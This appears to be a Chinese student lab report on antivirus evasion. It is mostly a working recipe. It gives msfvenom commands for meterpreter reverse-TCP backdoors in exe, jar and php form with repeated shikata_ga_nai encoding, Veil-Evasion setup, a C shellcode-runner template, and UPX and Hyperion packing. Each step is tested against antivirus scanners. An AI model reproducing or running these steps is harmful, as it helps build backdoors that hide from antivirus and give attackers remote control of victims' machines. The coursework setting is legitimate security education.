2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

一、实验内容

任务一正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，利用shellcode编程等免杀工具或技巧

1、使用msf编码器，生成exe文件

• 使用exp2中生产的后门程序20165334_backdoor.exe利用VirusTotal网站进行扫描检测。
  
• 20165334_backdoor.exe利用Virscan网站进行扫描检测。
  
  -使msf编码器对后门程序进行多次的编码，并检测。
  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe

• 用使用virscan进行扫描，结果如下所示
  

• msfvenom生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar
• 用使用virscan进行扫描，结果如下所示
  
• msfvenom生成php文件msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> 20155334_backdoor.php

• 用使用virscan进行扫描，结果如下所示
  

  2、使用veil-evasion生成后门程序及检测

• 用sudo apt-get install veil命令安装Veil，若遇到问题则用sudo apt-get upgrade这两个命令更新一下软件包即可之后用veil打开veil，输入y继续安装直至完成。
  
  -设置反弹连接IPset LHOST 192.168.56.102(IP是KaliIP)
• 设置端口set LPORT 5334
  
• 输入generate生成文件，接着输入你想要playload的名字:baddoor5334
  

• 扫描检测

3、半手工注入Shellcode并执行

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102LPORT=5334 -f c用c语言生成一段shellcode

-利用上面生成的数组拿来编写一个程序，结构如下

unsigned char buf[] = 
"此处复制粘贴之前用msf生成的buf"

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 使用命令i686-w64-mingw32-g++ shell5334.c -o shell5334.exe编译

• 扫描检测

-x尝试运行结果被360拦截了。

以上尝试可以看出没有处理的后门程序基本上都可以检测出来。

加壳

• 压缩壳 ：减少应用体积，如ASPack,UPX

• 加密壳： 版权保护，反跟踪。如ASProtect,Armadillo

• 虚拟机 ：通过类似编译手段，将应用指令转换为自己设计的指令集。如VMProtect,Themida

  1、使用压缩壳（UPX）

还是没能幸免，立刻被杀软截杀

在360中添加信任后测试其可用性。

2、加密壳Hyperion

• 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
• 进入目录/usr/share/windows-binaries/hyperion/中
• 输入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe进行加壳
• 

反弹连接

检测结果

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践

原文：https://www.cnblogs.com/ltl123/p/10623487.html